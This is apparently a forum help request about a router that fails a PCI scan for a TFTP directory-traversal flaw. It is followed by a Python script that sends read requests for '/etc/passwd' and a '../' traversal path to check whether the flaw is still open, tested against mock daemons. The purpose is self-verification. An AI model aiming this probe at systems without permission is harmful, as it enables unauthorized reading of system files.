I have a business customer who is using a D-Link DIR-825 router. Due to the nature of their transactions, the customer needs to be PCI compliant, and is using Security Metrics (securitymetrics.com) to scan their internet port for vulnerabilities.
The security scan has failed for port 69 - UDP for TFTP. Below are the details from the scan result:
Description: TFTP Traversal Arbitrary File Access
Synopsis: The remote TFTP server can be used to read arbitrary files on the remote host
Impact: The TFTP (Trivial File Transfer Protocol) server running on the remote host is vulnerable to a directory traversal attack that allows an attacker to read arbitrary files on the remote host by prepending their names with directory traversal sequences.
Data Received: SecurityMetrics was able to access a system file via the TFTP server using each of the following requests: /etc/passwd and ../../../../../../../../../../etc/passwd
Resolution: Disable the remote TFTP daemon, run it in a chrooted environment, or filter incoming traffic to this port.
Risk Factor: High / CVSS2 Base Score: 10.0
The router has the latest version of firmware/hardware. Last night I went into the advanced settings of the D-Link router, clicked on Virtual Server, selected port 69 UDP, and set Schedule = Never and Inbound Filter = Deny All.
Yet, the security scan has failed.
I am not sure what else I should change/configure on this router in order to disable the TFTP process. It is certainly not needed, so it can be terminated at any time.
Any ideas and assistance would be very much appreciated. Thank you.
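To see for yourself whether the TFTP daemon still answers before paying for a re-scan, the check below reproduces what the scanner did: an RFC 1350 read request (RRQ) for each of the two paths in the report, classifying the first reply as file DATA (the traversal works), an ERROR packet (the daemon refused it) or silence (port filtered or daemon stopped). This is an added example, not code from the original post, from D-Link or from SecurityMetrics; it assumes the scanner used a plain RRQ, which is what the "Data Received" line implies. The two mock daemons it probes on loopback are constructed stand-ins for an exposed and a chrooted tftpd, the passwd line they serve is made up, and 203.0.113.10 is a placeholder address. Run the probe from outside the network, as the scanner does, or it will only tell you what the LAN side sees.

```python
"""Reproduce the scanner's TFTP traversal probe (RFC 1350 read request).

Added example; not part of the original post or any D-Link/SecurityMetrics code.
"""
import socket
import struct
import threading

OPCODE_RRQ = 1
OPCODE_DATA = 3
OPCODE_ERROR = 5

# The two request paths listed in the scan report.
PROBE_PATHS = ["/etc/passwd", "../../../../../../../../../../etc/passwd"]


def build_rrq(filename, mode="octet"):
    """RRQ packet: opcode 1, filename, NUL, transfer mode, NUL (RFC 1350 section 5)."""
    return (struct.pack("!H", OPCODE_RRQ)
            + filename.encode() + b"\x00" + mode.encode() + b"\x00")


def parse_response(packet):
    """Classify the first packet a TFTP server sends back for an RRQ.

    Returns ("DATA", block, payload), ("ERROR", code, message),
    ("UNKNOWN", opcode, rest) or ("MALFORMED", None, packet).
    """
    if len(packet) < 4:
        return ("MALFORMED", None, packet)
    opcode, arg = struct.unpack("!HH", packet[:4])
    if opcode == OPCODE_DATA:
        return ("DATA", arg, packet[4:])
    if opcode == OPCODE_ERROR:
        msg = packet[4:].split(b"\x00", 1)[0].decode(errors="replace")
        return ("ERROR", arg, msg)
    return ("UNKNOWN", opcode, packet[4:])


def probe_tftp(host, port=69, paths=PROBE_PATHS, timeout=3.0):
    """Send one RRQ per path and report how the server answered.

    The socket is deliberately left unconnected: a real TFTP daemon replies
    from a fresh ephemeral port (its transfer ID), not from port 69, and a
    connected UDP socket would drop that reply. The DATA block is never
    ACKed, so the server just retransmits and gives up.
    """
    results = {}
    for path in paths:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)
        try:
            sock.sendto(build_rrq(path), (host, port))
            data, _ = sock.recvfrom(65535)
            kind, arg, payload = parse_response(data)
            if kind == "DATA":
                results[path] = "VULNERABLE: server returned %d bytes of file data" % len(payload)
            elif kind == "ERROR":
                results[path] = "refused (TFTP error %s: %s)" % (arg, payload)
            else:
                results[path] = "unexpected reply (%s)" % kind
        except socket.timeout:
            results[path] = "no reply (port filtered or daemon stopped)"
        finally:
            sock.close()
    return results


def start_mock_tftp(chrooted, requests=len(PROBE_PATHS)):
    """Constructed stand-in for a router TFTP daemon on a loopback port.

    chrooted=False behaves like the daemon in the scan report: every RRQ gets
    file data. chrooted=True behaves like a daemon locked to its root
    directory: absolute and '..' paths get error 2 (access violation).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    srv.settimeout(5.0)

    def serve():
        for _ in range(requests):
            try:
                pkt, peer = srv.recvfrom(65535)
            except socket.timeout:
                break
            name = pkt[2:].split(b"\x00", 1)[0].decode(errors="replace")
            if chrooted and (".." in name or name.startswith("/")):
                reply = struct.pack("!HH", OPCODE_ERROR, 2) + b"Access violation\x00"
            else:  # made-up passwd line, not from any real device
                reply = struct.pack("!HH", OPCODE_DATA, 1) + b"root:x:0:0:root:/root:/bin/sh\n"
            srv.sendto(reply, peer)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def run_demo():
    """Probe an exposed mock and a chrooted mock; returns both result dicts."""
    exposed = probe_tftp("127.0.0.1", start_mock_tftp(chrooted=False))
    hardened = probe_tftp("127.0.0.1", start_mock_tftp(chrooted=True))
    return exposed, hardened


if __name__ == "__main__":
    for label, res in zip(("exposed daemon", "chrooted daemon"), run_demo()):
        print(label)
        for path, verdict in res.items():
            print("  %-45s %s" % (path, verdict))
    # Against a real target, run from outside the network as the scanner does:
    # print(probe_tftp("203.0.113.10"))   # placeholder address
```

A "no reply" verdict from the WAN side is what a passing scan looks like; a DATA reply for either path means the daemon on the router itself is still reachable, whatever the Virtual Server rules say, since those rules govern forwarding to LAN hosts rather than services the router runs.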